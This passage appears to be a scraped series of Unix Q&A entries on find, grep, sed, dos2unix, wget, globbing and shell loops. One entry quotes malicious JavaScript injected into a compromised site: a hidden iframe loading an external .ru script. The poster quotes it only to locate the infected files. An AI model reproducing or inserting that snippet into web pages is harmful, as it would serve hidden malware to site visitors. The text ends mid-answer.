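The second chmod -R g+X hits the file precisely because the earlier u+x gave it an execute bit; the find variant sidesteps that entirely.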
| Why is chmod recursively changing file permissions as well? |
1,475,911,180,000 |
I need to list files in hierarchy of directory. For that I wrote script like
foreach file ( * )
ls ${file}/*/*/*/*/*.root > ${file}.txt
end
But for this I have to know that the directory ${file} contains 4 levels of subdirectories. So, is there any way to generalize this script, so that I do not have to know how many subdirectories are present?
|
Use the find command.
foreach file ( * )
find ${file} -name "*.root" > ${file}.txt
end
Consider using a shell other than csh, which has been obsolete for about 20 years. Use zsh or bash interactively, and don't use csh for scripts.
| List files in hierarchy of directory |
1,475,911,180,000 |
I have a large directory with tons of files and subdirectories in it. Is there a way to recursively search through all of these files and subdirectories and print out a list of all files containing an underscore (_) in their file name?
|
find . -name '*_*'
Thanks to Stéphane Chazelas as noted in the comments above!
| Recursively list files containing an underscore in the file name |
1,475,911,180,000 |
I am looking for a specific file in OS/X.
I can see the file by using:
ls -alR | grep "mkmf.*"
This shows me that the file exists.
How do I find which directory the file is located in?
Many thanks
|
Use find which is better suited for your intended purpose:
find . -name "mkmf*"
It will list all appearances of your pattern including the relative path. For more information look at manual page of find with man find or go to http://www.gnu.org/software/findutils/manual/html_mono/find.html
| How do I find a files directory? |
1,475,911,180,000 |
How do I make the following function work correctly
# Install git on demand
function git()
{
if ! type git &> /dev/null; then sudo $APT install git; fi
git $*;
}
by making git $* call /usr/bin/git instead of the function git()?
|
Like this:
# Install git on demand
function git()
{
if ! type -f git &> /dev/null; then sudo $APT install git; fi
command git "$@";
}
The command built-in suppresses function lookup. I've also changed your $* to "$@" because that'll properly handle arguments that aren't one word (e.g., file names with spaces).
Further, I added the -f argument to type, because otherwise it'll notice the function.
You may want to consider what to do in case of error (e.g., when apt-get install fails).
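The "$@" versus $* distinction is easy to see with a throwaway function (names invented for the demo):

```shell
show() { printf '<%s>\n' "$@"; }

unquoted() { show $*; }      # unquoted $*: arguments are re-split on whitespace
quoted()   { show "$@"; }    # "$@": each argument is passed through intact

unquoted "one arg" two   # -> <one> <arg> <two>
quoted   "one arg" two   # -> <one arg> <two>
```

The same `command` trick from the answer works inside any such wrapper: `command git` reaches the real binary even while a function named git is defined.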
| Install-on-Demand Wrapper Function for Executables |
1,475,911,180,000 |
I'm using:
grep -n -H -o -R -e textword .
Lists all files recursively under directory '.' containing the string 'textword', showing the file name, the line number, and only the matching portion.
I need to remove lines that matched the text using a Linux command.
|
find . -type f -exec sed -r -i "/textword/d" {} +
Remember that the search text is interpreted as a regexp by sed (with the -r option), so it might need escaping.
Use sed -i.backup to backup original files as <filename>.backup.
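A minimal run on one file shows both the deletion and the backup (GNU sed shown; the sample file is invented):

```shell
printf 'keep this\ntextword should go\nkeep this too\n' > sample.txt
sed -i.backup '/textword/d' sample.txt   # delete matching lines; keep the original as sample.txt.backup

cat sample.txt          # -> keep this / keep this too
cat sample.txt.backup   # the untouched original, all three lines
```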
| Search and replace full line in recursive files |
1,475,911,180,000 |
One of my website on my webserver has suffered an attack : code injection.
Here is the malicious code :
<script type=\"text/javascript\" language=\"javascript\">
(function () {
var t = document.createElement('iframe');
t.src = 'http://ahtiagge.ru/count27.php';
t.style.position = 'absolute';
t.style.border = '0';
t.style.height = '1px';
t.style.width = '1px';
t.style.left = '1px';
t.style.top = '1px';
if (!document.getElementById('t')) {
document.write('<div id=\'t\'></div>');
document.getElementById('t').appendChild(t);
}
})
();</script>
I want to know the names (and paths) of all files on my server containing the expression, to stanch the contagion. Here is the expression I want to match: 'http://ahtiagge.ru/count27.php'
I would like results like that :
/var/www/vhosts/site1.com/httpdocs/index.php
/var/www/vhosts/site1.com/httpdocs/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/and_sub/fileN.php
How can I solve this with a shell script? Is it possible?
|
You can simply use grep for this; with -F the pattern is treated as a literal string, so the dots and slashes need no escaping:
grep -RF "http://ahtiagge.ru/count27.php" /var/www/vhosts/
or only check in *.php files with the help of find (NUL delimiters keep file names with spaces intact):
find /var/www/vhosts/ -name "*.php" -print0 | xargs -0 grep -F "http://ahtiagge.ru/count27.php"
| find "an expression" on each file of a directory recursively |
1,475,911,180,000 |
Trying to do something like (in pseudo-unix):
scp -r <pwd> [email protected]:~/<dirname of toplevel>
In other words, I'm trying to copy the current directory I'm in locally (and the contents) over to remote while sticking the very last path segment from "pwd" commands output onto /home/user/<here> in the remote.
I'm shaky in my unix commands so I figured I'd ask vs. experiment this time to avoid damage
|
$ scp -pr "$PWD" [email protected]:"$(basename "$PWD")/"
basename strips everything but the last path segment, and -p preserves timestamps and modes. Since scp -r creates the source directory under the destination anyway, copying straight into the home directory with scp -pr "$PWD" [email protected]: also works.
| Use SCP from local machine to recursively copy current working directory to remote? |
1,475,911,180,000 |
I quite like mercurial .hgignore-style pattern globbing.
Globs are rooted at the current directory; a glob such as *.c will only match files in the current directory ending with .c.
The supported glob syntax extensions are ** to match any string across path separators and {a,b} to mean "a or b".
Is there a Linux shell that supports this?
|
All shells will support the standard glob *.c. KSH, Bash, and ZSH support brace expansion ({a,b}), but note that this is not a file glob, so it will always expand. ZSH's extended globbing and Bash's globstar (bash v4 or higher) support ** for recursive globbing.
| I quite like mercurial .hgignore-style globbing. Is there a Linux shell that supports it? |
1,475,911,180,000 |
For a Perl script I'm working on, I'm looking for a fast and reliable way to find all subdirectories (transitively) of a given directory which are leaves, i.e. those not having any subdirectories of their own. For example, given this hierarchy:
foo/
foo/bar/
foo/bar/baz
foo/you_fool
my hypothetical function, when called with "foo" as the argument, should return the list ("foo/bar/baz/", "foo/you_fool/").
Because this will clearly require File::Find or something equivalent, and that already does a stat system call for each file it finds, fast means not doing another stat on each file, although one extra stat on each directory, i.e. the value of $File::Find::dir is okay.
Because my main target system is Darwin aka MacOS, I unfortunately cannot use the nlink field of struct stat; it doesn't seem to be meaningful on that file system. I'm aware that on a "real Unix" file system I could just compare nlink to 2 for each directory.
If it matters, we may disregard symlinks, special files and all other oddities; the hierarchies I'll be searching are very clean and regular.
|
You could do something like:
perl -MFile::Find -le '
find(sub {
if (-d _) {
undef $leaves{$File::Find::name};
delete $leaves{$File::Find::dir};
}
}, ".");
print for keys %leaves'
undef sets hash element for the current dir to an undef value, while delete deletes the hash element for the parent directory. So at the end the keys of the %leaves hash contain only the leaves.
With -d _, we're reusing the information from the lstat() that File::Find did on the current file, so no extra lstat() / stat() is performed. With -d alone, an extra stat() (not lstat()) would be performed, which means it would also return true for symlinks to directories.
While it works in my test, it may not be a valid and future-proof thing to do. The documentation says:
[with "follow"] It is guaranteed that an lstat has been called before the
user's "wanted()" function is called. This enables fast file
checks involving "_". Note that this guarantee no longer holds
if follow or follow_fast are not set.
Doing if (! -l && -d _) may be safer, at the expense of an extra lstat() being performed for each file.
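As a slow but simple cross-check of the expected result (one extra find per directory, so no replacement for the single-pass Perl version), a shell loop produces the same leaves:

```shell
mkdir -p foo/bar/baz foo/you_fool

# A directory is a leaf when find sees no directory anywhere beneath it.
find foo -type d | while IFS= read -r d; do
    [ -z "$(find "$d" -mindepth 1 -type d -print -quit)" ] && printf '%s\n' "$d"
done | sort
# -> foo/bar/baz
#    foo/you_fool
```

-print -quit stops the inner find at the first subdirectory found, so non-leaves are rejected cheaply.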
| Detect leaf directories in Perl |
1,475,911,180,000 |
Why
I have two folders that should contain the exact same files, however, when I look at the number of files, they are different. I would like to know which files/folders are present in one, not the other. My thinking is I will make a list of all the files and then use comm to find differences between the two folders.
Question
How to make a list recursively of files and folders in the format /path/to/dir and /path/to/dir/file ?
Important notes
OS: Windows 11, subsystem Ubuntu 20.04.4 LTS
Locations folders: One network drive, one local
Size of folders: ~2tb each
|
You don't need any of that, just use diff -qr dir1 dir2. For example:
$ tree
.
├── dir1
│ ├── file1
│ ├── file3
│ ├── file4
│ ├── file6
│ ├── file7
│ ├── file8
│ └── subdir1
│ ├── dsaf
│ ├── sufile1
│ └── sufile3
└── dir2
├── file1
├── file2
├── file3
├── file4
├── file9
└── subdir1
├── sufile1
└── sufile3
4 directories, 16 files
If I now run diff -qr (-r for "recursive" and -q to only report when the files differ, and not show the actual differences) on the two directories, I get:
$ diff -qr dir1/ dir2/
Only in dir2/: file2
Only in dir1/: file6
Only in dir1/: file7
Only in dir1/: file8
Only in dir2/: file9
Only in dir1/subdir1: dsaf
That said, the way to get a list of files is find:
$ find dir1 -type f
dir1/subdir1/dsaf
dir1/subdir1/sufile1
dir1/subdir1/sufile3
dir1/file6
dir1/file1
dir1/file8
dir1/file4
dir1/file7
dir1/file3
Then, you can remove the dir1/ and dir2/ using sed, and compare the output of two directories using process substitution in a shell that supports it:
$ comm -3 <(find dir1 -type f | sed 's|dir1/||' | sort) <(find dir2 -type f | sed 's|dir2/||' | sort)
file2
file6
file7
file8
file9
subdir1/dsaf
Note that this assumes file names with no newline characters. If you need to handle those, just use the diff -r approach above.
| Recursively list path of files only |
1,475,911,180,000 |
I am doing some pre-processing on files. I have 2 text files which contains data in the following format.
Text File 1
"Name","Age","Class"
"Total Students:","247"
"John","14","8"
"Sara","13","8"
Text File 2
"Name","Age","Class"
"Total Students:","119"
"John","15","9"
"Sara","16","9"
What I am trying to do is remove the top 2 rows and the double quotes from these files, and then move the files to the output directory by using the following commands.
sed '1d' "$file" >> temp.txt
sed -i '1d' temp.txt
sed -i 's/"//g' temp.txt
mv temp.txt output/$file
The problem I am facing is that these commands only apply to a single file. The file names are Class_8.txt and Class_9.txt. Is there any way to apply the same commands to both files? I want to retain the original files and move the processed files to the output folder.
|
You can't conveniently run sed on multiple files and get it to write to more than one file in one go (if the input and output need to be separate files). It's possible using non-standard extensions or by hard-coding the names of the output files in the sed expressions.
Your operations are so simple though that we may want to use tail and tr in a loop instead:
for file in Class_{8,9}.txt; do
tail -n +3 "$file" | tr -d '"' >output/"$file"
done
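The tail | tr step can be sanity-checked on a stream before touching real files:

```shell
printf '"Name","Age","Class"\n"Total Students:","247"\n"John","14","8"\n' |
    tail -n +3 |    # start output at line 3, i.e. drop the first two lines
    tr -d '"'       # delete every double quote
# -> John,14,8
```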
Or, if you really want to use sed,
for file in Class_{8,9}.txt; do
sed -e '1,2d' -e 's/"//g' "$file" >output/"$file"
done
You could also copy the files first, then run sed with in-place editing in one go on the copies. This delegates, in a sense, the loop to the inner workings of GNU sed.
cp Class_{8,9}.txt output
sed -i -e '1,2d' -e 's/"//g' output/Class_{8,9}.txt
Note that removing the double quotes would mean writing invalid CSV output if any fields contain embedded commas or newlines. To delete only the unneeded double quotes, use a CSV parser such as csvformat from csvkit.
The above commands all assume that output is an existing directory that you are allowed to create files in.
| Apply same sed command on multiple text files |
1,475,911,180,000 |
I have a folder with a whole lot of folders with a whole lot of Markdown files in each. What I'd like to do is recursively (if possible) prepend the file name as a heading in each file.
So, given foo.md:
The cat sat on the carpet, which is really just endless mat to a cat.
I'd like:
# Foo.md
The cat sat on the carpet, which is really just endless mat to a cat.
I'm not bothered about the file extension. I am bothered that it is a valid Markdown heading 1 with a line afterwards.
My file structure looks like
md/
foo/
heaps.md
and.md
bar/
heaps.md
of.md
baz/
files.md
omg.md
and so on and so forth. Ideally, I'd love something that I can copy into a .sh or similar, but a one-liner would be nice too!
Cheers.
|
Try bash's globstar and ed plus some parameter expansion (P.E.); I suggest you try with some sample data/directory first.
shopt -s globstar
for f in md/**/*.md; do
header=${f##*/} header=${header^}
printf '%s\n' 0a "# $header" "" . w | ed -s "$f"
done
Or the one liner but remember to set globstar
for f in md/**/*.md; do header=${f##*/} header=${header^}; printf '%s\n' 0a "# $header" "" . w | ed -s "$f" ; done
To check the content of the files while globstar is still on you could try.
tail -n+1 md/**/*.md
0 is the address (line number) in the buffer, and a is the action, which means append.
The extra "" creates an empty line between the heading and the next line in the file.
1i (which means insert at line number one) instead of 0a would also work, but it fails on empty files.
. tells ed that we're done editing the file, and w writes the buffer back to the file.
We pipe (|) into ed -s, where -s means silent: don't output anything to stdout.
The rest is just variable assignment and parameter expansion (P.E.) in the bash shell.
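The two parameter expansions are worth seeing in isolation (file name invented):

```shell
f=md/foo/heaps.md
header=${f##*/}            # strip the longest prefix matching "*/" -> heaps.md
printf '%s\n' "$header"    # -> heaps.md
# ${header^} (bash 4+) would then upper-case the first character: Heaps.md
```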
| Append file name to beginning of [Markdown] file recursively |
1,475,911,180,000 |
I have a PHP application with is located on Linux with multiple directories (and sub-directories) and many PHP, JS, HTML, CSS, etc files. Many of the files have Windows EOL control characters and I am also concerned that some might not be UTF-8 encoded but maybe ISO-8859-1, Windows-1252, etc. My desire is to convert all files to UTF-8 with LF only.
Looks like I might have a couple steps.
The dos2unix man provides this solution:
find . -name *.txt |xargs dos2unix
https://stackoverflow.com/a/11929475 provides this solution:
find . -type f -print0 | xargs -0 dos2unix
https://stackoverflow.com/a/7068241 provides this solution:
find ./ -type f -exec dos2unix {} \;
I recognize the first will only convert txt files which isn't what I want but I can easily change to target all files using -type f. That being said, is one solution "better" than the other? If so, why? Is it possible to tell which files will be changed without changing them? When I finally change them, I don't want the date to change, and intend to use dos2unix's --keepdate flag. Should any other options be used?
Next, I will need to deal with encoding. https://stackoverflow.com/a/805474/1032531 recommends enca (or its sister command encov) and https://stackoverflow.com/a/64889/1032531 recommends iconv. It also seems like file might be applicable. Again, which one (or maybe something else altogether) should be used? I installed enca, and when executing enca --list languages it lists several languages but not English (maybe choose "none"?), so I question its applicability. iconv was already installed; however, it does not have a man page (at least man iconv doesn't produce one). How can it be used to recursively check and convert encoding?
Please confirm/correct my proposed solution or provide a complete solution.
|
There's quite a few questions here rolled into one.
Firstly, when using find I would always use -exec instead of xargs. As a general rule it's better to do things in as few commands as possible. Also, the first two methods write all the file names out to a text stream ready for xargs to re-interpret back into file names. It's a needless step which only adds an (admittedly small) opportunity to fail.
dos2unix will accept multiple file names so I would use:
find . -type f -exec dos2unix --keepdate {} +
This will stack up long lists of files and then kick off dos2unix on a whole bunch of them at once.
To find out which files will be touched, just drop the -exec clause:
find . -type f
Encoding changes are far more problematic. Please be aware that there is no way to reliably determine the current encoding of any text file. It can sometimes be guessed but that is never 100% reliable. So you can only batch process encoding if you are sure all the files are currently the same encoding.
I would recommend using iconv. It really is the default too for this job. You can find a man page for it here:
https://linux.die.net/man/1/iconv
There's a working example of how to use iconv with find here:
https://stackoverflow.com/questions/4544669/batch-convert-latin-1-files-to-utf-8-using-iconv
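A minimal iconv round trip, assuming the sources really are ISO-8859-1 (é is byte 0xE9 in that encoding; file names invented):

```shell
printf 'caf\351\n' > latin1.txt                      # one ISO-8859-1 encoded line
iconv -f ISO-8859-1 -t UTF-8 latin1.txt > utf8.txt   # convert to UTF-8
cat utf8.txt                                         # -> café
```

Wrapping this in the same find loop as dos2unix (writing to a temp file, then moving it back) converts a whole tree, but only do so once you are confident every file shares the source encoding.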
| Recursively converting Windows files to Unix files |
1,475,911,180,000 |
mv -Z applies the default selinux context. Does it differ from all other invocations of mv, and work on all the files in a moved directory individually?
|
Yes.
$ mkdir a
$ touch a/b
$ ls -Z -d a a/b
unconfined_u:object_r:user_home_t:s0 a
unconfined_u:object_r:user_home_t:s0 a/b
$ strace -f mv -Z a ~/.local/share/Trash/files
...
open("/home/alan/.local/share/Trash/files/a/b", O_RDONLY|O_NOFOLLOW) = 3
...
fgetxattr(3, "security.selinux", "unconfined_u:object_r:user_home_t:s0", 255) = 37
fsetxattr(3, "security.selinux", "unconfined_u:object_r:data_home_t:s0", 37, 0) = 0
...
$ cd ~/.local/share/Trash/files
$ ls -Zd a a/b
unconfined_u:object_r:data_home_t:s0 a
unconfined_u:object_r:data_home_t:s0 a/b
This also introduces the possibility that moving a directory within a single filesystem will fail part-way through, e.g. due to lack of disk space when changing the labels. The impact of this is mitigated because the relabel happens as a second step: the initial move operation is still a single atomic rename. This means the labels could be left inconsistent, but the files will be consistent in every other way, and it should be simple to fix the labels once space becomes available.
| Does `mv --context` (for selinux, a.k.a. -Z) correctly apply labels recursively to directory contents? |
1,475,911,180,000 |
I saw some of the posts on this website about how to download files from a directory recursively. So, I executed the following line:
wget -r -nH --cut-dirs=3 -A '*.bz2' -np http://www.xfce.org/archive/xfce-4.6.2/src/
It only downloads the index page and then deletes it automatically.
Output:
--2016-07-01 16:56:02-- http://www.xfce.org/archive/xfce-4.6.2/src/
Resolving www.xfce.org (www.xfce.org)... 138.48.2.103
Connecting to www.xfce.org (www.xfce.org)|138.48.2.103|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://archive.xfce.org/xfce/4.6.2/src/ [following]
--2016-07-01 16:56:17-- http://archive.xfce.org/xfce/4.6.2/src/
Resolving archive.xfce.org (archive.xfce.org)... 138.48.2.107
Connecting to archive.xfce.org (archive.xfce.org)|138.48.2.107|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘index.html’
index.html [ <=> ] 8.05K --.-KB/s in 0.03s
2016-07-01 16:56:23 (247 KB/s) - ‘index.html’ saved [8239]
Removing index.html since it should be rejected.
FINISHED --2016-07-01 16:56:23--
Total wall clock time: 21s
Downloaded: 1 files, 8.0K in 0.03s (247 KB/s)
The web-directory contains a lot of tar.bz2 files. Can anyone tell me where I'm going wrong?
My wget version is 1.16.3
|
It seems it is not trivial to get a directory listing over HTTP; I could get the bz2 files as below (sort -u deduplicates the URLs; uniq -c would prepend counts and break the list fed to wget):
wget -k -l 0 "http://archive.xfce.org/xfce/4.6.2/src/" -O index.html ; grep -o 'http://archive.xfce.org/xfce/4.6.2/src/[^"]*\.bz2' index.html | sort -u | xargs wget
| wget not downloading files recursively |
1,475,911,180,000 |
I have a root folder with a text file in it called pairs.txt.
Within that root folder are other folders with text files called pairs.txt in them.
Is there a simple way to remove them using rm?
I know that there I could use find . -name 'pairs.txt' -exec rm {} \; but I would like to know of other ways, perhaps using * or some other wildcard?
I tried using rm -rf pairs.txt but it seems to only remove the pairs.txt in the current directory.
|
With bash 4+:
shopt -s globstar dotglob
rm -- **/pairs.txt
The globstar option makes ** match any number of directory levels. The dotglob option makes it include directories whose name begins with . (dot files).
With ksh93, use set -o globstar instead of shopt -s globstar. To get the effect of dotglob, use FIGNORE=.
With zsh, use the second line directly. To include dot files, run setopt glob_dots first or make the second line rm -- **/pairs.txt(D).
Note that bash's ** follows symbolic links to directories. Ksh's and zsh's don't.
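A quick sandbox run (bash 4+, directory names invented) shows both copies going in one command:

```shell
mkdir -p sandbox/sub
touch sandbox/pairs.txt sandbox/sub/pairs.txt

# ** matches zero or more directory levels, so this hits both files.
bash -c 'cd sandbox && shopt -s globstar dotglob && rm -- **/pairs.txt'

find sandbox -name pairs.txt   # no output: both files are gone
```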
| Removing specific files recursively using rm or something simple? |
1,475,911,180,000 |
I have downloaded about 3200 websites to the depth 2. So now I have one master folder (abc) that contains many folders, containing files for each website. So my folder abc contains 3200 folders and each folder contains other folders that contains files with text from the websites. I have also a script that can edit text in each file. It is stored in file named lynx.sh:
#!/bin/bash
fileA=$1
while IFS= read -r lineA
do
LTRA=$(echo "${lineA:0:1}")
catA=$(lynx -dump -nonumbers -nomargins -nolist -noprint -width 1000 -assume_charset=utf-8 $2/*.* )
editA=$(echo "$catA" | sed -e 's/\[[^][]*\]//g')
editB=$(echo "$editA" | sed -e 's/\s\+/\n/g')
editC=$(echo "$editB" | sed '/^http/ d' )
editD=$(echo "$editC" | sed '/^IFRAME/ d' )
editE=$(echo "$editD" | sed 's/<[^>]*>//g' )
editF=$(echo "$editE" | sed -r 's/[^aáäbcčdďdzdžeéfghchiíjklĺľmnňoópqrŕsštťuúvwxyýzžAÁÄBCČDĎDZDŽEÉFGHCHIÍJKLĹĽMNŇOÓPQRŔSŠTŤUÚVWXYÝZŽ][^aáäbcčdďdzdžeéfghchiíjklĺľmnňoópqrŕsštťuúvwxyýzžAÁÄBCČDĎDZDŽEÉFGHCHIÍJKLĹĽMNŇOÓPQRŔSŠTŤUÚVWXYÝZŽ]+//g' )
editG=$(echo "$editF" | sed s'/[^aáäbcčdďdzdžeéfghchiíjklĺľmnňoópqrŕsštťuúvwxyýzžAÁÄBCČDĎDZDŽEÉFGHCHIÍJKLĹĽMNŇOÓPQRŔSŠTŤUÚVWXYÝZŽ]$//')
editH=$(echo "$editG" | sed s'/^[^aáäbcčdďdzdžeéfghchiíjklĺľmnňoópqrŕsštťuúvwxyýzžAÁÄBCČDĎDZDŽEÉFGHCHIÍJKLĹĽMNŇOÓPQRŔSŠTŤUÚVWXYÝZŽ]//')
editI=$(echo "$editH" | sed 's/ .*//')
editJ=$(echo "$editI" | sed '/^$/d' )
echo "$editJ" > $2/"blaaa"_lynx.txt
echo "$lineA"
done <"$fileA"
It edits the text in each file so that every word is on a new line. I have used this script many times before, with the file input.txt, which contains the names of all the websites I have.
Now I am trying to process all folders in my abc folder at once. I have tried something like this:
find /home/student/eny/abc -exec lynx.sh {} \;
find /home/student/eny/abc/* -iname -exec ./lynx.sh input.txt {} \;
and many others. I can not find a solution for this.
In input.txt there are names of sites, for example kosice.sk, bratislava.sk, presov.sk. Every site name is on a new line and they are in alphabetical order. They are also the names of the first-level directories.
|
Here is the final version of your command
find /home/student/eny/abc -type f -exec ./lynx.sh {} \;
Points to note:
-type f finds files only
you should specify the path to your script; ./ (dot slash) means the current dir, but you may want to specify the full path
lynx.sh should have its executable bit set; file mode 0755 would be fine
| How to find files and act on them (find + exec) |
1,425,972,805,000 |
Suppose, we have the following files in a directory:
test.txt
test.txt~
/subdir
test1.txt
test1.txt~
When I run rm -r ./*.*~ inside top dir only test.txt~ is removed.
Why doesn't it perform the recursive removal despite the fact that I used recursive flag?
You can reproduce my case with the following script:
#create dir and 1-st level test files
mkdir dir
cd dir
touch test.txt
touch test.txt~
#create subdir and 2-nd level test files
mkdir subdir
cd subdir/
touch test1.txt~
touch test1.txt
cd ..
rm -r ./*.*~
|
*.*~ only matches names in the current directory that have a . in them somewhere and end in ~; the glob itself never descends into subdirectories. The -r flag makes rm recurse into directories, but only into directories that the glob matched, so subdir/test1.txt~ is never seen.
If you would like to find all the files that end in ~ from the directory you're in I would use find like
find -type f -name '*~' -delete
| Recursive rm doesn't work for me |
1,425,972,805,000 |
If I make a .tar.gz via
tar czvf - ./myfiles/ | pigz -9 -p 16 > ./mybackup.tar.gz,
Can I safely unzip an already gzip'd file ./myfiles/an_old_backup.tar.gz within the ./myfiles directory via
gzip -d mybackup.tar.gz
tar -xvf mybackup.tar
cd myfiles
gzip -d an_old_backup.tar.gz
tar -xvf an_old_backup.tar
? And can one do this recursive compression safely ad infinitum?
|
If your question can be rephrased as "is it OK to have compressed
archives within compressed archives?", then the answer is "yes".
This may not be the most convenient (as you note, you will have to run
tar several times to get everything unpacked), and applying
compression to data that has already been compressed may not yield an
additional reduction in size, but it will all work.
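A round trip confirms it; note that modern tar handles the gzip step itself via z, so the separate gzip -d calls are optional (file names invented):

```shell
mkdir -p myfiles
echo hello > payload.txt
tar czf myfiles/an_old_backup.tar.gz payload.txt   # a compressed archive inside myfiles
tar czf mybackup.tar.gz myfiles                    # compress the directory, inner archive and all

rm -rf myfiles payload.txt                         # start from nothing
tar xzf mybackup.tar.gz                            # outer layer (tar z decompresses itself)
tar xzf myfiles/an_old_backup.tar.gz               # inner layer
cat payload.txt                                    # -> hello
```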
| Is it safe to do recursive compression with tar, gzip and pigz? |
1,425,972,805,000 |
How can I delete all 'nohup.out' files within a directory recursively from my terminal? I'm using CentOS.
|
There can't be multiple files named nohup.out in a single directory, so I assume you mean that you want to remove it recursively:
find . -name nohup.out -exec rm {} +
If you are using GNU find, you can use -delete:
find . -name nohup.out -delete
In bash4+, you can also use globstar:
shopt -s globstar dotglob
rm -- **/nohup.out
Note, however, that globstar traverses symlinks when descending the directory tree, and may break if the length of the file list exceeds the limit on the size of arguments.
| Delete all 'nohup.out' within a directory recursively |
1,425,972,805,000 |
How can I do a fast text replace with recursive directories and filenames with spaces and single quotes? Preferably using standard UNIX tools, or alternatively a well-known package.
Using find with -exec ... \; is extremely slow for many files, because it spawns a new process for each file, so I'm looking for a way that integrates directory traversal and string replacement as one operation.
Slow search:
find . -name '*.txt' -exec grep foo {} \;
Fast search:
grep -lr --include=*.txt foo
Slow replace:
find . -name '*.txt' -exec perl -i -pe 's/foo/bar/' {} \;
Fast replace:
# Your suggestion here
(This one is rather fast, but is two-pass and doesn't handle spaces.)
perl -p -i -e 's/foo/bar/g' `grep -lr --include=*.txt foo`
|
You'd only want to use the:
find . -name '*.txt' -exec cmd {} \;
form for those cmds that can only take one argument. That's not the case of grep. With grep:
find . -name '*.txt' -exec grep foo /dev/null {} +
(or use -H with GNU grep). More on that at Recursive grep vs find / -type f -exec grep {} \; Which is more efficient/faster?
Now for replacement, that's the same, perl -pi can take more than one argument:
find . -name '*.txt' -type f -exec perl -pi -e s/foo/bar/g {} +
Now that would rewrite the files regardless of whether they contain foo or not. Instead, you may want (assuming GNU grep and xargs or compatible):
find . -name '*.txt' -type f -exec grep -l --null foo {} + |
xargs -r0 perl -pi -e s/foo/bar/g
Or:
grep -lr --null --include='*.txt' foo . |
xargs -r0 perl -pi -e s/foo/bar/g
So only the files that contain foo be rewritten.
BTW, --include=*.txt (--include being another GNU extension) is a shell glob, so should be quoted. For instance, if there was a file called --include=foo.txt in the current directory, the shell would expand --include=*.txt to that before calling grep. And if not, with many shells, you'd get an error about the glob failing to match any file.
So you'd want grep --include='*.txt'
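A self-contained run of the NUL-delimited pipeline, substituting GNU sed -i for perl -pi (same idea, both rewrite in place; file names invented):

```shell
mkdir -p tree/sub
printf 'foo here\n' > 'tree/a file.txt'   # a name with a space, handled via NUL delimiters
printf 'nothing\n'  > tree/sub/b.txt

grep -rl --null --include='*.txt' foo tree |
    xargs -r0 sed -i 's/foo/bar/g'

cat 'tree/a file.txt'   # -> bar here
cat tree/sub/b.txt      # untouched -> nothing
```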
| Fast string replace in recursive directories |
1,425,972,805,000 |
I'm having trouble with grep's manner of interpreting "recursive" searching compared to cp. Maybe it's just that I use them differently.
Here, grep seems to interpret "recursive" differently from cp. Is that correct? (That is my question.)
Per my Question to navigate through this on SO...
With files containing the grep-matched string:
./file1.js
./file2.php
./inc/file3.js
./inc/file4.php
./inc.php/file5.php
grep -R "find me" *.php
Returns:
./file2.php
./inc.php/file5.php
...because grep wants to match both directories and files containing ".php"
But, if I use cp to copy recursively, say:
cp -r inc/* ~/mywork/
Files in the "inc" folder will be copied, along with all directories et cetera, albeit not hidden files, regardless of whether they have "inc" in their name.
Do grep and cp have different meanings of "recursive" or do they treat "recursive" the same? Could someone help me understand how different path/file arguments are interpreted by cp and grep the same way?
|
Your grep command,
grep -R "find me" *.php
... contains a filename globbing pattern, *.php. This will be expanded by the shell before the shell executes grep, so the actual command at execution may look something like
grep -R "find me" file1.php file2.php inc.php
... where inc.php happens to be a directory name.
The grep utility would then search the given files for the expression that you provided. For directories mentioned on the command line, it would search all files and subdirectories beneath the directory for files with contents matching the expression. This means you would have found a match in inc.php/subdir/README had that file contained the string find me.
In short: Process (search for matching lines within) each name given on the command line according to the given options (recursively).
The cp command works the same way with regards to recursive actions:
cp -r inc/* ~/mywork/
The shell would expand the above command to something like
cp -r inc/file1 inc/file2 inc/dir1 inc/dir2 /home/myself/mywork/
The cp utility would then, for each individually named file or directory, copy that file or directory recursively to the destination directory.
In short: Process (copy to destination) each name given on the command line according to the given options (recursively).
Additional notes:
The support in grep for searching recursively is a non-standard extension.
Filename globbing patterns that may expand to names starting with a dash should be handled with care to not be confused with command-line options. Your grep command is, therefore, more safely written as
grep -R -- "find me" *.php
or as
grep -R -e "find me" -- *.php
... where -- delimits the options and their arguments from the non-option operands. Your cp command does not have that issue, as the globbing pattern is guaranteed to expand to something starting with the string inc/.
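The inc.php behaviour is easy to reproduce in a scratch directory (GNU grep assumed; all names below are invented):

```shell
tmp=$(mktemp -d)
cd "$tmp"
mkdir -p inc.php/subdir
printf 'find me\n' > file2.php
printf 'find me\n' > inc.php/subdir/README

# The glob expands to both the file and the directory; grep -R then
# searches everything beneath the directory argument.
grep -Rl "find me" *.php
# file2.php
# inc.php/subdir/README
```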
| Do grep and cp treat "recursive" the same? |
1,425,972,805,000 |
I have a bash script below that is intended to curl against a list of domains, from a file, and output the results.
#!/bin/bash
baseurl=https://csp.infoblox.com
domains=/home/user/Documents/domainlist
B1Dossier=/tide/api/data/threats/state/host?host=$domains
APIKey=<REDACTED>
AUTH="Authorization: Token $APIKey"
for domain in $domains; do curl -H "$AUTH" -X GET ${baseurl}${B1Dossier} > /tmp/outputfile; done
Unfortunately, the script is not going through each domain in the file whatsoever.
To help understand, I have listed the expectation/explanation of the script:
Within the file, /home/user/Documents/domainlist, I have a handful of domains.
I'm attempting to use the API to check each domain in the file, by appending the variable $domains at the end of B1Dossier
The expectation is that it would run the specified curl command against each domain, within the file, and output the results.
For added visibility, I included the working curl command used for a single domain below:
curl -H 'Authorization: Token <REDACTED>' -X GET https://csp.infoblox.com/tide/api/data/threats/state/host?host=<place domain here>
Can someone assist in what I'm doing wrong and how I can fix this?
|
You can read the domains from file to an array and loop for them.
baseurl="https://csp.infoblox.com"
B1Dossier="/tide/api/data/threats/state/host?host="
url="${baseurl}${B1Dossier}"
# read domains to an array
mapfile -t domains < /home/user/Documents/domainlist
# loop for domains
for d in "${domains[@]}"; do
curl -H "$AUTH" -X GET "${url}${d}" >> temp
done
Notes:
In your command, using B1Dossier inside the loop has no effect: it seems you were expecting some kind of recursive evaluation, because the domain is embedded in B1Dossier and you loop over domain. But the URL never changes inside the loop that way. Note also that for domain in $domains iterates over the words of the path string itself, not over the lines of the file it points to.
Also, you have to append the responses to your destination file using >> or else every next response would overwrite the previous one.
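A minimal check of the mapfile step with a throwaway list (bash assumed; domains invented):

```shell
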